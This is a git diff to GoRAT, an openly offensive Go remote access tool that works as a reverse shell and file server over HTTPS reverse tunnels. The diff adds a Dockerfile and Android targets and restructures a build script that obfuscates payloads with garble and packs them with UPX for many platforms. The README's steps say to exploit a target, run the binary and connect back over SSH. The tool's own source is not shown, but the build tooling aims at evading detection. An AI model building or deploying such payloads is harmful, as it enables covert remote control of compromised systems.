diff --git a/Dockerfile b/Dockerfile new file mode 100644 index 0000000..b9cdcfc --- /dev/null +++ b/Dockerfile @@ -0,0 +1,13 @@ +FROM golang:1.16.6-buster +RUN apt-get update +RUN apt-get install -y upx sudo unzip gcc-arm-linux-gnueabihf g++-arm-linux-gnueabihf libc6-armel-cross libc6-dev-armel-cross binutils-arm-linux-gnueabi libncurses5-dev build-essential bison flex libssl-dev bc + +# Copy Source Files +RUN mkdir /GoRAT +WORKDIR /GoRAT +COPY . . + +# Build Payload +RUN go mod download -x +RUN go get mvdan.cc/garble@latest +RUN ./build_payload.sh -a diff --git a/README.MD b/README.MD index cdf79d4..32e478f 100644 --- a/README.MD +++ b/README.MD @@ -18,27 +18,35 @@ GoRAT(Go Remote Access Tool) is an extremely powerful yet simple reverse shell, file server, and control plane using HTTPS reverse tunnels as a transport mechanism. (GoRAT is not anonymous and designed for CTF players, Go enthusiasts, and security experts.) ### Supported Distros: -| 64Bit Distros | 32Bit Distros | -|---------------------|---------------------| -| Linux | Linux | -| FreeBSD | FreeBSD | -| OpenBSD | OpenBSD | -| Linux ARM | Linux ARM | -| FreeBSD ARM | FreeBSD ARM | -| OpenBSD ARM | OpenBSD ARM | -| Linux MIPS | Linux MIPS | -| MacOS | Windows (kinda) | -| Windows (kinda) | | - -# Installing and Building - +| 64Bit Distros | 32Bit Distros | +|---------------------|-------------------------------| +| Linux | Linux | +| FreeBSD | FreeBSD | +| OpenBSD | OpenBSD | +| Linux ARM | Linux ARM | +| FreeBSD ARM | FreeBSD ARM | +| OpenBSD ARM | OpenBSD ARM | +| Linux MIPS | Linux MIPS | +| MacOS | (NOT BUILDING) MacOS | +| Android ARM | (NOT BUILDING) Android ARM | +| Windows (kinda) | Windows (kinda) | + +# Installing and Building Native 1. Set up a full GoLang build environment -2. Install [UPX](https://upx.github.io/) and run `go install mvdan.cc/garble` -3. Fill out `config.sh` and run `./build_payload.sh --garble` -4. Transfer the `BUILD` folder to your "attacking" machine, install [bc](https://linux.die.net/man/1/bc) and run `./start_server.sh` -5. Exploit your system and run the binary -6. Connect to the "target" via normal ssh from the "attacking" machine +2. Install [UPX](https://upx.github.io/) +3. Install [Garble](https://github.com/burrowers/garble) with `go get mvdan.cc/garble` +4. Fill out `config.sh` +5. Run `./build_payload.sh --all` + +# Installing and Building with Docker +1. Install and start docker +2. Fill out `config.sh` +3. Run `./build_payload.sh --docker` +# Using the Payloads +1. Transfer the `BUILD` folder to your "attacking" machine, install [bc](https://linux.die.net/man/1/bc) and run `./start_server.sh` +2. Exploit your system and run the binary +3. Connect to the "target" via normal ssh from the "attacking" machine # Chisel Server Usage GoRAT uses the standard release binaries provided by the [chisel project](https://github.com/jpillora/chisel/releases). The server requires a number of configure options and has fairly verbose logging. For this reason a small shell script is provided to start and parse the output of chisel for easy use. To use it, run the following: @@ -55,7 +63,6 @@ Session #1 | SSH Server Mounted On: 27819 ============================================= Session #2 | Control Server Mounted On: 33132 Session #2 | SSH Server Mounted On: 33133 - ``` # Payload Usage diff --git a/build_payload.sh b/build_payload.sh index 023cb20..3843d08 100755 --- a/build_payload.sh +++ b/build_payload.sh @@ -13,8 +13,8 @@ COMPILE_CORE="$SRC_DIR/goRAT.go" function Stage { # Clean Before Stage - rm -rf $BUILD_DIR - rm -rf $SRC_DIR + sudo rm -rf $BUILD_DIR + sudo rm -rf $SRC_DIR mkdir $BUILD_DIR mkdir $SRC_DIR mkdir $BUILD_DIR/scripts @@ -39,6 +39,25 @@ function ProgressBar { printf "\rProgress : [${_fill// /#}${_empty// /-}] ${_progress}%%" } +function BuildDocker { + sudo docker build . -t gorat_build + ID=$(sudo docker run -d gorat_build) + sudo docker cp $ID:/GoRAT/BUILD/payloads $BUILD_DIR + sudo docker stop $ID + sudo docker rm $ID +} + +function BuildAndroid { + echo "" + echo "Starting Android Payload Build... (NOT FULLY WORKING)" + # Non-Garble Tests + ProgressBar 0 2 + GOOS=android GOARCH=arm64 go build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_android_arm64 "$COMPILE_CORE" + ProgressBar 1 2 + GOOS=android GOARCH=arm GOARM=7 CC=arm-linux-gnueabihf-gcc CGO_ENABLED=1 go build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_android_arm "$COMPILE_CORE" + ProgressBar 2 2 +} + function BuildTest { # Non-Garble Tests ProgressBar 0 6 @@ -56,106 +75,141 @@ function BuildTest { ProgressBar 6 6 } -function BuildGarble() { +function BuildGarble64() { + echo "" + echo "Starting 64bit Payload Garble..." + ###################### ## 64 Bit Systems #################### - ProgressBar 0 29 + ProgressBar 0 15 GOOS=linux GOARCH=amd64 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_64 "$COMPILE_CORE" upx "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_64 1> /dev/null - ProgressBar 1 29 + ProgressBar 1 15 GOOS=linux GOARCH=arm64 GOARM=5 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_arm64_ARM5 "$COMPILE_CORE" upx "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_arm64_ARM5 1> /dev/null - ProgressBar 2 29 + ProgressBar 2 15 GOOS=linux GOARCH=arm64 GOARM=6 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_arm64_ARM6 "$COMPILE_CORE" upx "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_arm64_ARM6 1> /dev/null - ProgressBar 3 29 + ProgressBar 3 15 GOOS=linux GOARCH=arm64 GOARM=7 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_arm64_ARM7 "$COMPILE_CORE" upx "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_arm64_ARM7 1> /dev/null - ProgressBar 4 29 + ProgressBar 4 15 GOOS=linux GOARCH=amd64 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_mips_64 "$COMPILE_CORE" # RIP no UPX for MIPS64 - ProgressBar 5 29 + ProgressBar 5 15 GOOS=windows GOARCH=amd64 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_windows_64.exe "$COMPILE_CORE" upx "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_windows_64.exe 1> /dev/null - ProgressBar 6 29 + ProgressBar 6 15 GOOS=darwin GOARCH=amd64 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_macos_64 "$COMPILE_CORE" upx "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_macos_64 1> /dev/null - ProgressBar 7 29 + ProgressBar 7 15 # RIP no UPX for freebsd GOOS=freebsd GOARCH=amd64 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_freebsd_64 "$COMPILE_CORE" - ProgressBar 8 29 + ProgressBar 8 15 GOOS=freebsd GOARCH=arm64 GOARM=5 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_freebsd_arm64_ARM5 "$COMPILE_CORE" - ProgressBar 9 29 + ProgressBar 9 15 GOOS=freebsd GOARCH=arm64 GOARM=6 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_freebsd_arm64_ARM6 "$COMPILE_CORE" - ProgressBar 10 29 + ProgressBar 10 15 GOOS=freebsd GOARCH=arm64 GOARM=7 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_freebsd_arm64_ARM7 "$COMPILE_CORE" - ProgressBar 11 29 + ProgressBar 11 15 # RIP no UPX for openbsd GOOS=openbsd GOARCH=amd64 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_openbsd_64 "$COMPILE_CORE" - ProgressBar 12 29 + ProgressBar 12 15 GOOS=openbsd GOARCH=arm64 GOARM=5 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_openbsd_arm64_ARM5 "$COMPILE_CORE" - ProgressBar 13 29 + ProgressBar 13 15 GOOS=openbsd GOARCH=arm64 GOARM=6 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_openbsd_arm64_ARM6 "$COMPILE_CORE" - ProgressBar 14 29 + ProgressBar 14 15 GOOS=openbsd GOARCH=arm64 GOARM=7 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_openbsd_arm64_ARM7 "$COMPILE_CORE" - ProgressBar 15 29 + ProgressBar 15 15 +} + +function BuildGarble32() { + echo "" + echo "Starting 32bit Payload Garble..." ###################### ## 32 Bit Systems #################### + ProgressBar 0 14 GOOS=linux GOARCH=386 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_32 "$COMPILE_CORE" upx "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_32 1> /dev/null - ProgressBar 16 29 + ProgressBar 1 14 GOOS=linux GOARCH=mips garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_mips_32 "$COMPILE_CORE" upx "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_mips_32 1> /dev/null - ProgressBar 17 29 + ProgressBar 2 14 GOOS=linux GOARCH=arm GOARM=5 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_arm_ARM5 "$COMPILE_CORE" upx "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_arm_ARM5 1> /dev/null - ProgressBar 18 29 + ProgressBar 3 14 GOOS=linux GOARCH=arm GOARM=6 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_arm_ARM6 "$COMPILE_CORE" upx "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_arm_ARM6 1> /dev/null - ProgressBar 19 29 + ProgressBar 4 14 GOOS=linux GOARCH=arm GOARM=7 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_arm_ARM7 "$COMPILE_CORE" upx "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_linux_arm_ARM7 1> /dev/null - ProgressBar 20 29 + ProgressBar 5 14 GOOS=windows GOARCH=386 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_windows_32.exe "$COMPILE_CORE" upx "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_windows_32.exe 1> /dev/null - ProgressBar 21 29 + ProgressBar 6 14 # RIP no UPX for freebsd GOOS=freebsd GOARCH=386 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_freebsd_32 "$COMPILE_CORE" - ProgressBar 22 29 + ProgressBar 7 14 GOOS=freebsd GOARCH=arm GOARM=5 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_freebsd_arm_ARM5 "$COMPILE_CORE" - ProgressBar 23 29 + ProgressBar 8 14 GOOS=freebsd GOARCH=arm GOARM=6 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_freebsd_arm_ARM6 "$COMPILE_CORE" - ProgressBar 24 29 + ProgressBar 9 14 GOOS=freebsd GOARCH=arm GOARM=7 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_freebsd_arm_ARM7 "$COMPILE_CORE" - ProgressBar 25 29 + ProgressBar 10 14 # RIP no UPX for openbsd GOOS=openbsd GOARCH=386 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_openbsd_32 "$COMPILE_CORE" - ProgressBar 26 29 + ProgressBar 11 14 GOOS=openbsd GOARCH=arm GOARM=5 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_openbsd_arm_ARM5 "$COMPILE_CORE" - ProgressBar 27 29 + ProgressBar 12 14 GOOS=openbsd GOARCH=arm GOARM=6 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_openbsd_arm_ARM6 "$COMPILE_CORE" - ProgressBar 28 29 + ProgressBar 13 14 GOOS=openbsd GOARCH=arm GOARM=7 garble -literals -tiny -seed=random build -o "$BUILD_DIR"/payloads/"$EXE_NAME"_v"$VERSION"_openbsd_arm_ARM7 "$COMPILE_CORE" - ProgressBar 29 29 + ProgressBar 14 14 } # Loop through arguments and process them for arg in "$@" do case $arg in - -g|--garble) + + -d|--docker) + Stage + BuildDocker + ;; + + -a|--all) + Stage + BuildGarble64 + BuildGarble32 + BuildAndroid + Cleanup + ;; + + -32|--32bit) + Stage + BuildGarble32 + Cleanup + ;; + + -64|--64bit) + Stage + BuildGarble64 + Cleanup + ;; + + -m|--mobile) Stage - BuildGarble + BuildAndroid Cleanup ;; @@ -168,7 +222,10 @@ do *) echo "usage: build_payload.sh" echo "" - echo " -g, --garble Builds a Garbled Payload for each Arch/Distro Pair" + echo " -a, --all Builds all Payloads Garbled If Possible for each Arch/Distro Pair" + echo " -32, --32bit Builds a Garbled Payload for each Arch/Distro Pair" + echo " -64, --64bit Builds a Garbled Payload for each Arch/Distro Pair" + echo " -m, --mobile Builds a Garbled Payload for each Arch/Distro Pair" echo " -t, --test Builds a Un-Garbled Payload on 64bit Archs Only" echo "" ;;